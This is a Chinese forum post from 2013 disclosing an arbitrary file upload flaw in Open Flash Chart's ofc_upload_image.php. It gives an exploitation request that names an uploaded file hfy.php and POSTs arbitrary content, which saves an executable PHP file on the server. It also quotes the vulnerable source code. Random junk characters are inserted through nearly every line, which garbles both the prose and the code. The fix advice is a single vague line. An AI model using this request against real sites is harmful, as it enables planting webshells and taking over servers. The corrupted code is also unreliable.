POST 数据漏洞文件执行任意后缀文件保存
3 @% d: F3 d0 o% t7 w 漏洞文件/chart/php-ofc-library/ofc_upload_image.php
& V; ?% r( W* V$ h/ p6 L5 n1 ?! p& k5 c
利用:" a; ^5 q7 D. p' y* K4 N2 w
/chart/php-ofc-library/ofc_upload_image.php?name=hfy.php hfy.php 文件名
0 U( X: G% J& t7 \
K0 E) X+ p" a+ b6 A6 APost任意数据
+ g, O+ n# |% }8 g& g: {保存位置http://localhost/chart/tmp-upload-images/hfy.php7 _! w3 P8 B0 y a0 n
7 G5 I! @- X3 |0 L3 |# @ @$ e
! G5 u' S2 C8 x# e9 K# P最新版wss漏洞文件,即使是收费版本也有的,在新浪商店部署的demo~' {- U/ M1 t2 M% o9 `+ Q
/ V* k% @# U1 r: @
<?php
& F" Q7 o0 F: {5 L
& y8 j: l- G+ ^3 W" x2 Q//
- B4 d1 l! \% ]// In Open Flash Chart -> save_image debug mode, you. `, x6 @& p* T
// will see the 'echo' text in a new window.: p6 i4 u/ z [ U
//" m; @0 S. W3 F- k
6 |7 z& {5 t% n4 f/*
$ E9 z! \# D- R/ x( l( Q6 b8 [3 X
1 B% H1 Z, O5 m" c# hprint_r( $_GET );
* ~8 S p' [8 C0 wprint_r( $_POST );
" u9 ]8 O* I0 v+ r2 qprint_r( $_FILES );4 u* a5 Y9 t3 ~- ?9 q0 I' {
( ~2 k) k" s( J8 e( r2 c l+ E
print_r( $GLOBALS );( i: ^8 v' v: z$ |( q' Y
print_r( $GLOBALS["HTTP_RAW_POST_DATA"] );' q+ J! b; \/ G) x0 L4 Q
% J! T5 j/ V! S. ]8 U% J1 s
*// W* ?2 o( Y- U4 r/ D
// default path for the image to be stored //% u6 Z, Q# M0 M/ `: @
$default_path = '../tmp-upload-images/';
/ Y( _" ?) M1 Z8 K# v
1 v$ ]* ]3 q* B u M. _5 |if (!file_exists($default_path)) mkdir($default_path, 0777, true);
0 s7 M" D$ g; ], r
8 Y$ ?( O, K4 Z8 u4 U1 Z// full path to the saved image including filename //& S8 x/ E3 S9 v |. x0 P h
$destination = $default_path . basename( $_GET[ 'name' ] ); ; A+ v: z% Y: r9 Y- f o
' O% V: |6 @7 r8 h( J" B% P& X
echo 'Saving your image to: '. $destination;
- |" r) \" D: ?* S# @" A// print_r( $_POST );/ H/ g( |+ [' a8 N7 d. I9 ]6 l
// print_r( $_SERVER );
1 s! E; F7 {, \! R w// echo $HTTP_RAW_POST_DATA;
. a0 v4 T! w% r6 `1 Q0 ~9 ?& i; o4 B2 W9 S: ]5 z6 I
//
/ z7 V0 d z' Y! N// POST data is usually string data, but we are passing a RAW .png0 B/ j8 o, N; C4 t' k3 ]3 U4 q
// so PHP is a bit confused and $_POST is empty. But it has saved# K2 q" p- U2 ~$ K: p1 T L
// the raw bits into $HTTP_RAW_POST_DATA, K( O8 q% O0 k( t/ `
//# i; J1 D+ y0 r* n" S* ]
' u+ Q$ H* w+ l6 X; ^$jfh = fopen($destination, 'w') or die("can't open file"); D4 T) w/ T0 x
fwrite($jfh, $HTTP_RAW_POST_DATA);# z+ }2 @, A+ O- Y4 I" g, W
fclose($jfh);; m% M6 F$ K* o* r. i
8 [8 E0 ~+ A) D1 |4 p//
% i6 G" {/ o7 |1 j+ f# ?( ]// LOOK: n$ d2 W7 g/ E
//
# b* ~9 @, L9 kexit();: i- Q' a2 T: t
//
, U; X7 j8 Z0 Z# u4 H2 C. x// PHP5:
/ ^2 C' `1 ?! U//- i( R+ [5 F% J
! ^) }) V0 @, I# X! _4 ]
* X5 J! O4 Z# B% A) L' I( ~) L
// default path for the image to be stored //
7 ]6 W1 j1 p$ e5 P" W* a5 O$default_path = 'tmp-upload-images/';
* ~; {, ^0 g8 k7 K X4 P1 j
C8 _/ b. i4 p4 bif (!file_exists($default_path)) mkdir($default_path, 0777, true);
8 C" {8 j) }! G9 ^& a" q0 `% n# K9 Y! ?; n$ I2 `& i. b) y
// full path to the saved image including filename //
2 X& M' m) s5 _" L$ `$destination = $default_path . basename( $_FILES[ 'Filedata' ][ 'name' ] );
! M6 e# ]6 u% ]# x1 I
9 h" l8 Z! i( R2 K* u* g7 O2 b// move the image into the specified directory //; l% d0 b) w5 E2 ?5 N2 v
if (move_uploaded_file($_FILES[ 'Filedata' ][ 'tmp_name' ], $destination)) {
* H$ o9 O; t+ k2 V. @. T% H2 [ echo "The file " . basename( $_FILES[ 'Filedata' ][ 'name' ] ) . " has been uploaded;";) _" o1 @; }( i3 j
} else {2 ~6 U* s0 u. D; e. o
echo "FILE UPLOAD FAILED"; W# L, F. K; f, @7 x2 n
}
9 U. s) O$ B" b- K5 R ?" B+ o- Q% h' b# E+ r5 n
7 C: }) O u+ Z/ d2 T( y) c% X
?>! J) N N. `# n' u9 |
9 Z+ t( d9 g2 X q! F
. n9 ^' Z* G- U5 b* T$ _
$ A, m# f% F. |
1 z' `' L+ g4 q9 v' p
; c5 i# c% Y0 \9 g7 k9 g6 ~, K- @
修复方案: % v; v" b% L$ [" r6 N8 E2 ]4 ?1 m
这个漏洞文件就是个杯具,怎么破,加权限验证,后缀等验证~,自己搞 - x! a4 Y: ~. ]8 V/ H) x) x
: K! m( O/ L" N0 N
[' A) [* H1 S# U, ?; T% e0 a, b9 j. X( {
0 [6 l: X& s& @! H& I; \0 J6 q |
发表于 2013-2-23 12:38:58
收藏
支持
反对